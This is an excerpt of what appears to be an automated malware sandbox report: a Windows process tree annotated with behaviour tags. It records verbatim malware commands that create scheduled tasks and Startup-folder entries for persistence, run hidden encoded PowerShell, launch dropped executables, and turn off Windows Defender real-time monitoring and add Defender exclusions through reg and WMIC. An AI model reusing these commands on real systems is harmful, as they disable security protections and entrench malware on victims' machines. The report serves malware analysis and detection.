                                                              • Checks processor information in registry
                                                              • Modifies registry class
                                                              PID:3012
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3012.0.1553291856\1939716468" -parentBuildID 20221007134813 -prefsHandle 1204 -prefMapHandle 1196 -prefsLen 21788 -prefMapSize 233836 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e49108e3-2566-4735-9d33-08a6fabfe18b} 3012 "\\.\pipe\gecko-crash-server-pipe.3012" 1268 13ff7558 gpu
                                                                7⤵
                                                                  PID:2012
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3012.1.1535736369\2145594819" -parentBuildID 20221007134813 -prefsHandle 1472 -prefMapHandle 1468 -prefsLen 22649 -prefMapSize 233836 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2b09fc1-6847-4205-84ee-df9de94fdfb8} 3012 "\\.\pipe\gecko-crash-server-pipe.3012" 1484 45f2258 socket
                                                                  7⤵
                                                                    PID:3544
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3012.2.2131576455\693304010" -childID 1 -isForBrowser -prefsHandle 2096 -prefMapHandle 1996 -prefsLen 22752 -prefMapSize 233836 -jsInitHandle 824 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {62cab515-dda7-4889-a4d6-c358244a3cae} 3012 "\\.\pipe\gecko-crash-server-pipe.3012" 1828 1aa0d358 tab
                                                                    7⤵
                                                                      PID:1128
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3012.3.1741536257\329426175" -childID 2 -isForBrowser -prefsHandle 2324 -prefMapHandle 2320 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 824 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {387f0f1f-35fe-4a74-a2be-87f9944526b9} 3012 "\\.\pipe\gecko-crash-server-pipe.3012" 2664 1ca79358 tab
                                                                      7⤵
                                                                        PID:3304
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3012.4.508944010\368180639" -childID 3 -isForBrowser -prefsHandle 3584 -prefMapHandle 3580 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 824 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bcf82441-edf3-454c-bf1b-dc950d73bda0} 3012 "\\.\pipe\gecko-crash-server-pipe.3012" 3588 1cbc3258 tab
                                                                        7⤵
                                                                          PID:2312
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3012.5.9086608\1800769856" -childID 4 -isForBrowser -prefsHandle 3696 -prefMapHandle 3700 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 824 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ffb1e431-58b6-42bf-bd63-dabad4f376c6} 3012 "\\.\pipe\gecko-crash-server-pipe.3012" 3684 1cbc4458 tab
                                                                          7⤵
                                                                            PID:3160
                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3012.6.1950737936\1885953936" -childID 5 -isForBrowser -prefsHandle 3872 -prefMapHandle 3876 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 824 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4b962079-4bcb-452f-9b3b-10e55fa71fd1} 3012 "\\.\pipe\gecko-crash-server-pipe.3012" 3860 1cbc5058 tab
                                                                            7⤵
                                                                              PID:3200
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                          5⤵
                                                                            PID:3332
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                              6⤵
                                                                              • Checks processor information in registry
                                                                              • Modifies registry class
                                                                              PID:1636
                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1636.0.193282621\1083087226" -parentBuildID 20221007134813 -prefsHandle 1200 -prefMapHandle 984 -prefsLen 21972 -prefMapSize 234060 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4588fec2-89bf-454f-9b80-a10ee4b0583e} 1636 "\\.\pipe\gecko-crash-server-pipe.1636" 1312 45f4758 gpu
                                                                                7⤵
                                                                                  PID:2516
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1636.1.1522044626\643137191" -parentBuildID 20221007134813 -prefsHandle 1464 -prefMapHandle 1460 -prefsLen 22833 -prefMapSize 234060 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f0b456b-b882-4380-a56f-9c424fd6c0c1} 1636 "\\.\pipe\gecko-crash-server-pipe.1636" 1476 f5dd258 socket
                                                                                  7⤵
                                                                                    PID:2444
                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1636.2.1072925329\97219919" -childID 1 -isForBrowser -prefsHandle 1692 -prefMapHandle 1200 -prefsLen 22936 -prefMapSize 234060 -jsInitHandle 556 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e4c46ddc-46df-439a-badb-7c047a979697} 1636 "\\.\pipe\gecko-crash-server-pipe.1636" 1868 1a4b1258 tab
                                                                                    7⤵
                                                                                      PID:3452
                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1636.3.694027568\1888255075" -childID 2 -isForBrowser -prefsHandle 2620 -prefMapHandle 2616 -prefsLen 27285 -prefMapSize 234060 -jsInitHandle 556 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {dc22956b-463d-4854-a583-250162816197} 1636 "\\.\pipe\gecko-crash-server-pipe.1636" 2632 1e9a5b58 tab
                                                                                      7⤵
                                                                                        PID:2456
                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1636.4.1746360865\780919259" -childID 3 -isForBrowser -prefsHandle 2488 -prefMapHandle 2736 -prefsLen 27285 -prefMapSize 234060 -jsInitHandle 556 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {54b4437e-7303-414e-bbe9-064634d4f3a1} 1636 "\\.\pipe\gecko-crash-server-pipe.1636" 2620 1c9d3058 tab
                                                                                        7⤵
                                                                                          PID:3212
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1636.5.516124383\454371960" -childID 4 -isForBrowser -prefsHandle 3564 -prefMapHandle 3528 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 556 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1aaa4097-dbb5-4177-aa0c-6d95b9d2d463} 1636 "\\.\pipe\gecko-crash-server-pipe.1636" 3576 22ba5f58 tab
                                                                                          7⤵
                                                                                            PID:1436
                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1636.6.1564131126\993270826" -childID 5 -isForBrowser -prefsHandle 3684 -prefMapHandle 3688 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 556 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {539a1aa6-1564-470c-b533-f7287d84dba9} 1636 "\\.\pipe\gecko-crash-server-pipe.1636" 3672 22ba6e58 tab
                                                                                            7⤵
                                                                                              PID:1788
                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1636.7.1357971217\22857907" -childID 6 -isForBrowser -prefsHandle 3860 -prefMapHandle 3864 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 556 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {24100519-f0ac-47fb-88b4-a09f4504d3d2} 1636 "\\.\pipe\gecko-crash-server-pipe.1636" 3848 22bf5258 tab
                                                                                              7⤵
                                                                                                PID:3420
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1636.8.2025939314\1722345374" -childID 7 -isForBrowser -prefsHandle 4228 -prefMapHandle 4224 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 556 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6fc6faba-df7f-4421-b9f0-7af48b4e086f} 1636 "\\.\pipe\gecko-crash-server-pipe.1636" 4240 22722f58 tab
                                                                                                7⤵
                                                                                                  PID:3636
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1636.9.136261089\2065402606" -childID 8 -isForBrowser -prefsHandle 3652 -prefMapHandle 3644 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 556 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {df787a66-689d-4b62-aef2-6d8942a30b0b} 1636 "\\.\pipe\gecko-crash-server-pipe.1636" 3660 d66e58 tab
                                                                                                  7⤵
                                                                                                    PID:3688
                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000310001\shopfree.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\1000310001\shopfree.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:3404
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                                          2⤵
                                                                                            PID:1040
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                                              3⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:2084
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & echo URL="C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & exit
                                                                                            2⤵
                                                                                            • Drops startup file
                                                                                            PID:2312
                                                                                        • C:\Windows\system32\taskeng.exe
                                                                                          taskeng.exe {840A71E5-66CA-473C-AC23-16651F7E643E} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]
                                                                                          1⤵
                                                                                            PID:1684
                                                                                            • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              PID:3088
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                              2⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Drops file in System32 directory
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2212
                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                3⤵
                                                                                                  PID:3948
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                2⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Drops file in System32 directory
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:3092
                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                  3⤵
                                                                                                    PID:2944
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                  2⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Drops file in System32 directory
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1480
                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                    3⤵
                                                                                                      PID:1720
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    PID:3640
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                    2⤵
                                                                                                      PID:3792
                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                        3⤵
                                                                                                        • Checks processor information in registry
                                                                                                        PID:3856
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:3032
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:2944
                                                                                                  • C:\Windows\system32\taskeng.exe
                                                                                                    taskeng.exe {BCDA29A5-514E-4265-B367-A20417699D3F} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                    1⤵
                                                                                                      PID:3080
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\tKpoBoM.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\tKpoBoM.exe PV /csIOdidbHNk 385121 /S
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Drops file in System32 directory
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:3108
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                          3⤵
                                                                                                            PID:3316
                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                              4⤵
                                                                                                              • Indirect Command Execution
                                                                                                              PID:3288
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                5⤵
                                                                                                                  PID:3324
                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                    6⤵
                                                                                                                      PID:444
                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                  4⤵
                                                                                                                  • Indirect Command Execution
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:3328
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                    5⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:2576
                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                      6⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:1236
                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                  4⤵
                                                                                                                  • Indirect Command Execution
                                                                                                                  PID:2288
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                    5⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:2944
                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                      6⤵
                                                                                                                        PID:1932
                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                    4⤵
                                                                                                                    • Indirect Command Execution
                                                                                                                    PID:1720
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                      5⤵
                                                                                                                        PID:3412
                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                          6⤵
                                                                                                                            PID:3408
                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                        4⤵
                                                                                                                        • Indirect Command Execution
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:3372
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                          5⤵
                                                                                                                            PID:3364
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                              6⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              • Drops file in System32 directory
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:3356
                                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                7⤵
                                                                                                                                  PID:3140
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          schtasks /CREATE /TN "gSWJYXZQM" /SC once /ST 06:07:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                          3⤵
                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                          PID:3640
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          schtasks /run /I /tn "gSWJYXZQM"
                                                                                                                          3⤵
                                                                                                                            PID:2460
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /DELETE /F /TN "gSWJYXZQM"
                                                                                                                            3⤵
                                                                                                                              PID:2340
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:2544
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                                                                  4⤵
                                                                                                                                  • Modifies Windows Defender Real-time Protection settings
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:1488
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:2488
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                                                                    4⤵
                                                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                                                    PID:1000
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /CREATE /TN "gzIusJRvB" /SC once /ST 18:28:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                  3⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                  PID:2880
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /run /I /tn "gzIusJRvB"
                                                                                                                                  3⤵
                                                                                                                                    PID:1480
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /DELETE /F /TN "gzIusJRvB"
                                                                                                                                    3⤵
                                                                                                                                      PID:3772
                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                                                                      3⤵
                                                                                                                                      • Indirect Command Execution
                                                                                                                                      PID:776
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                        4⤵
                                                                                                                                          PID:3060
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                            5⤵
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:2464
                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                              6⤵
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:2616
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                        3⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:3960
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                          4⤵
                                                                                                                                          • Windows security bypass
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:2728
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                        3⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:4012
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
